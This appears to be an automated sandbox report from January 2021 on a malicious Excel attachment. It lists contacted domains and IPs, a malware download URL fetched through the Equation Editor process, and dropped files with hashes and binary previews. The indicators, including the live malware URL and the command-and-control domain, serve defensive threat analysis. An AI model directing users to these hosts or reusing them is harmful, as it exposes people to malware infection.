http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://127.0.0.1:	0%	Virustotal		Browse
http://127.0.0.1:	0%	Avira URL Cloud	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://gammavilla.org	0%	Virustotal		Browse
http://gammavilla.org	0%	Avira URL Cloud	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://191.96.149.225/new.exe	100%	Avira URL Cloud	malware
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/U	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/U	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/U	0%	URL Reputation	safe
http://mail.gammavilla.org	0%	Avira URL Cloud	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://r3.i.lencr.org/0	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
gammavilla.org	217.174.152.38	true	true	0%, Virustotal, Browse	unknown
mail.gammavilla.org	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://191.96.149.225/new.exe	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://127.0.0.1:	vbc.exe, 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	vbc.exe, 00000004.00000002.2162756537.0000000004E60000.00000002.00000001.sdmp, vbc.exe, 00000005.00000002.2370083933.0000000005E90000.00000002.00000001.sdmp	false		high
http://crl.entrust.net/server1.crl0	vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	false		high
http://cps.letsencrypt.org0	vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://gammavilla.org	vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ocsp.entrust.net03	vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.telegram.org/bot%telegramapi%/	vbc.exe, 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp	false		high
http://r3.o.lencr.org0	vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.%s.comPA	vbc.exe, 00000004.00000002.2162756537.0000000004E60000.00000002.00000001.sdmp, vbc.exe, 00000005.00000002.2370083933.0000000005E90000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.diginotar.nl/cps/pkioverheid0	vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/U	vbc.exe, 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://mail.gammavilla.org	vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net0D	vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://secure.comodo.com/CPS0	vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	vbc.exe, 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://servername/isapibackend.dll	vbc.exe, 00000005.00000002.2371956308.0000000007B00000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://crl.entrust.net/2048ca.crl0	vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	false		high
http://cps.root-x1.letsencrypt.org0	vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://r3.i.lencr.org/0	vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
217.174.152.38	unknown	Bulgaria		31083	TELEPOINTBG	true
191.96.149.225	unknown	Chile		396073	MAJESTIC-HOSTING-01US	true

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	339305
Start date:	13.01.2021
Start time:	20:41:24
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 57s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	0AX4532QWSA.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winXLSX@6/12@16/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 3.6% (good quality ratio 3.3%) Quality average: 81% Quality standard deviation: 31.3%
HCA Information:	Successful, ratio: 92% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 192.35.177.64, 93.184.221.240, 2.20.142.210, 2.20.142.209 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, apps.digsigtrust.com, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, wu.wpc.apr-52dd2.edgecastdns.net, apps.identrust.com, au-bg-shim.trafficmanager.net, wu.azureedge.net Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:42:07	API Interceptor	64x Sleep call for process: EQNEDT32.EXE modified
20:42:10	API Interceptor	1158x Sleep call for process: vbc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
217.174.152.38	Swift Advice.exe	Get hash	malicious	Browse
	swift copy_pdf.exe	Get hash	malicious	Browse
	QUOTATION_PDF.gz.exe	Get hash	malicious	Browse
	Payment Swift_pdf.gz.exe	Get hash	malicious	Browse
	payment.exe	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
MAJESTIC-HOSTING-01US	SHIIb1tABn.exe	Get hash	malicious	Browse	38.68.46.205
	jUtUh49xpS.exe	Get hash	malicious	Browse	38.68.46.205
	DEC 10-12 Wire.xlsx	Get hash	malicious	Browse	104.37.175.25
	RFQ.20073555.xlsx	Get hash	malicious	Browse	104.37.175.25
	02_extracted.exe	Get hash	malicious	Browse	104.37.172.166
	document.docx	Get hash	malicious	Browse	104.37.172.209
	RFQ 202011655458794.exe	Get hash	malicious	Browse	191.96.140.245
	Statement 04 Oct-20.img.jar	Get hash	malicious	Browse	104.37.174.230
	Statement 04 Oct-20.img.jar	Get hash	malicious	Browse	104.37.174.230
	PO-HH00890.exe	Get hash	malicious	Browse	191.101.130.254
	Remittance Advice 06 Nov_20.jar	Get hash	malicious	Browse	104.37.174.230
	Remittance Advice 06 Nov_20.jar	Get hash	malicious	Browse	104.37.174.230
	Request Quote_PDF.exe	Get hash	malicious	Browse	104.37.172.166
	P.O-NH807686.exe	Get hash	malicious	Browse	191.101.130.254
	MtFzNM6dBT.exe	Get hash	malicious	Browse	104.37.172.166
	Price.exe	Get hash	malicious	Browse	104.37.172.166
	http://www.radiokart.com/wp-content/plugins/Epsonscannedimg009208-04-20.jar	Get hash	malicious	Browse	191.101.130.49
	RFQ-PO-#075609-MT002-08-05-20-Order_Specfication,xlxs.exe	Get hash	malicious	Browse	104.37.175.147
	RFQ-PO-0075609-MT002-08-05-20-Order_Specfication,xlxs.exe	Get hash	malicious	Browse	104.37.175.147
	PO-0576879-0025-MT-Order_Quote-Specfication,xlxs.exe	Get hash	malicious	Browse	104.37.175.147
TELEPOINTBG	INV8222874744_20210111490395.xlsm	Get hash	malicious	Browse	217.174.149.3
	spetsifikatsiya.xls	Get hash	malicious	Browse	79.124.76.20
	spetsifikatsiya.xls	Get hash	malicious	Browse	79.124.76.20
	document-1932597637.xls	Get hash	malicious	Browse	217.174.152.52
	document-1932597637.xls	Get hash	malicious	Browse	217.174.152.52
	document-1961450761.xls	Get hash	malicious	Browse	217.174.152.52
	document-1909441643.xls	Get hash	malicious	Browse	217.174.152.52
	document-1961450761.xls	Get hash	malicious	Browse	217.174.152.52
	document-1909441643.xls	Get hash	malicious	Browse	217.174.152.52
	document-1942925331.xls	Get hash	malicious	Browse	217.174.152.52
	document-1942925331.xls	Get hash	malicious	Browse	217.174.152.52
	document-1892683183.xls	Get hash	malicious	Browse	217.174.152.52
	document-1892683183.xls	Get hash	malicious	Browse	217.174.152.52
	document-1909894964.xls	Get hash	malicious	Browse	217.174.152.52
	document-1909894964.xls	Get hash	malicious	Browse	217.174.152.52
	document-1965918496.xls	Get hash	malicious	Browse	217.174.152.52
	document-1965918496.xls	Get hash	malicious	Browse	217.174.152.52
	document-1901557343.xls	Get hash	malicious	Browse	217.174.152.52
	document-1901557343.xls	Get hash	malicious	Browse	217.174.152.52
	document-1958527977.xls	Get hash	malicious	Browse	217.174.152.52

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Users\Public\vbc.exe
File Type:	Microsoft Cabinet archive data, 58936 bytes, 1 file
Category:	dropped
Size (bytes):	58936
Entropy (8bit):	7.994797855729196
Encrypted:	true
SSDEEP:	768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
MD5:	E4F1E21910443409E81E5B55DC8DE774
SHA1:	EC0885660BD216D0CDD5E6762B2F595376995BD0
SHA-256:	CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
SHA-512:	2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
Malicious:	false
Reputation:	high, very likely benign file
Preview:	MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............\|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..D..agaV..2.\|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.\|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..\|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....\|.....Q...'....X..C.....a;...Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	893
Entropy (8bit):	7.366016576663508
Encrypted:	false
SSDEEP:	24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
MD5:	D4AE187B4574036C2D76B6DF8A8C1A30
SHA1:	B06F409FA14BAB33CBAF4A37811B8740B624D9E5
SHA-256:	A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
SHA-512:	1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
Malicious:	false
Reputation:	high, very likely benign file
Preview:	0..y...H.........j0..f...1.0....H.........N0..J0..2.......D....'..09...@k0....H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0....H.............0..........P..W..be......,k0.[...}.@......3vI.?!I..N..>H.e...!.e..2....w..{........s.z..2..~..0....8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i.....)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0....H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..\|.Wv..(9..e...w.j..w.......)...55.1.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	326
Entropy (8bit):	3.123186963792904
Encrypted:	false
SSDEEP:	6:kKTYCwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:mkPlE99SNxAhUegeT2
MD5:	32E596D60B1420543D1489D6B5044A34
SHA1:	C67E6926E3CBF559CC6DDD1C5A8D3BBBFF03381C
SHA-256:	4423C7932F2489469DBA6E865A892EE43064AB538CCABACE961A67180A3CD543
SHA-512:	C384DEC0E12F6C04ADC5EF60D6DB3A129AD3405BA0163BD323C3E96DD825B8E21989915AAC1AD47767AB58F2666FC84A833F03308933CA8141D60DEFE2F67929
Malicious:	false
Reputation:	low
Preview:	p...... ...........=...(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	252
Entropy (8bit):	3.010594871269615
Encrypted:	false
SSDEEP:	3:kkFklhMPIlfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kKbPOliBAIdQZV7eAYLit
MD5:	5CEF381E0214BC424AC5B78FDCAF75CA
SHA1:	54581BE4387033BC4E5A8F2F6582ADB99942040B
SHA-256:	44EB8AB261977454BF1E64CAE389AC2D899EE93C92623CF4E3E85F638A56E656
SHA-512:	2096464EE4482D5CEF6329124214F641AE57F661AEA50D9EE2CED98DC825872044941EF31DF2EBC438E403CC5AC2D083C9A1C40463BD2A3B74F491CCFAD1C6C0
Malicious:	false
Reputation:	low
Preview:	p...... ....`....2 N=...(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	812032
Entropy (8bit):	7.920094533275065
Encrypted:	false
SSDEEP:	12288:yvNFVgCBX3xTqRv2RVozqB6Gnw3OvLS19TTPshs+nEQqkmyaIIQFq:MFVR352+DQSRW193sTnEdPy3
MD5:	72B76DB11728DD92AA4C3CB45F155B05
SHA1:	743E9F3600FD98E8F73F0E61DF6EDB1571BD4523
SHA-256:	469EF5404A9F75003F9A50A94BFBBBC339F1F649275FEE87C102F72D4F97443E
SHA-512:	705A3ED3401AF991B0548164B2C5D66A28B86CE57F11685C71A6B47935EC79DB53056E9EDFC8E3458CC7B6168D8452B4AFC918E5AF8051942DC5068F08E9A7C4
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
IE Cache URL:	http://191.96.149.225/new.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..Z...........y... ........@.. ....................................@.................................<y..O................................... y............................................... ............... ..H............text....Y... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B................py......H...........\.......K...@K...-...........................................0..B........s.........(.......(.....(.......(....o.......s....(.......(.....".(.......0..............r...p..(......9.........s........s ......8........a...%..=.o!.........o"...ri..p(#.......,q.....o"....(#.......,Z.+:....a...%..=.o!.........o"...r{..p(#.......,.......($...&...o%...%.r...po&..........-......o%...%........:L......&......o'........&.......+...*.......,......................0...........s(.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\26ECC369.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category:	dropped
Size (bytes):	48770
Entropy (8bit):	7.801842363879827
Encrypted:	false
SSDEEP:	768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5:	AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1:	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256:	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512:	A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\825E1F08.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category:	dropped
Size (bytes):	48770
Entropy (8bit):	7.801842363879827
Encrypted:	false
SSDEEP:	768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5:	AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1:	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256:	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512:	A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C5384863.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1099960
Entropy (8bit):	2.015315507528159
Encrypted:	false
SSDEEP:	3072:hXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cy:/ahIFdyiaT2qtXw
MD5:	C7141BC7A8B7E57597F8B4911CAE00A3
SHA1:	802966622B3360818CA9F46E0477DABD3AB1C417
SHA-256:	BE7D5C9CC490CFC8FEAD865FDD5AEE3A2025A4815387E649BC40F167B9B65143
SHA-512:	ACF3EB53C093B0941DE217D45F84059B45CE0B4665CF58E2DE999126BDE6E67256D3EAEBA0CF7DBF472455875E91A0853ACF600153271C99EBE388B92ADDFB1D
Malicious:	false
Reputation:	low
Preview:	....l...........S................@...%.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I.......%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................&.(.&.......&...&..N.S..&...&.......&.p.&..N.S..&...&. ....yJR..&...&. .........E..zJR............................................X...%...7...................{ .@................C.a.l.i.b.r...............&.X.....&...&..2CR..........&...&..{AR......&...E.dv......%...........%...........%...........!.......................I......."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I.......P... ...6...F..........EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Temp\Cab5D20.tmp Download File
Process:	C:\Users\Public\vbc.exe
File Type:	Microsoft Cabinet archive data, 58936 bytes, 1 file
Category:	dropped
Size (bytes):	58936
Entropy (8bit):	7.994797855729196
Encrypted:	true
SSDEEP:	768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
MD5:	E4F1E21910443409E81E5B55DC8DE774
SHA1:	EC0885660BD216D0CDD5E6762B2F595376995BD0
SHA-256:	CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
SHA-512:	2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
Malicious:	false
Reputation:	high, very likely benign file
Preview:	MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............\|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..D..agaV..2.\|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.\|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..\|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....\|.....Q...'....X..C.....a;...Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........

C:\Users\user\AppData\Local\Temp\Tar5D21.tmp Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	modified
Size (bytes):	152533
Entropy (8bit):	6.31602258454967
Encrypted:	false
SSDEEP:	1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
MD5:	D0682A3C344DFC62FB18D5A539F81F61
SHA1:	09D3E9B899785DA377DF2518C6175D70CCF9DA33
SHA-256:	4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
SHA-512:	0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
Malicious:	false
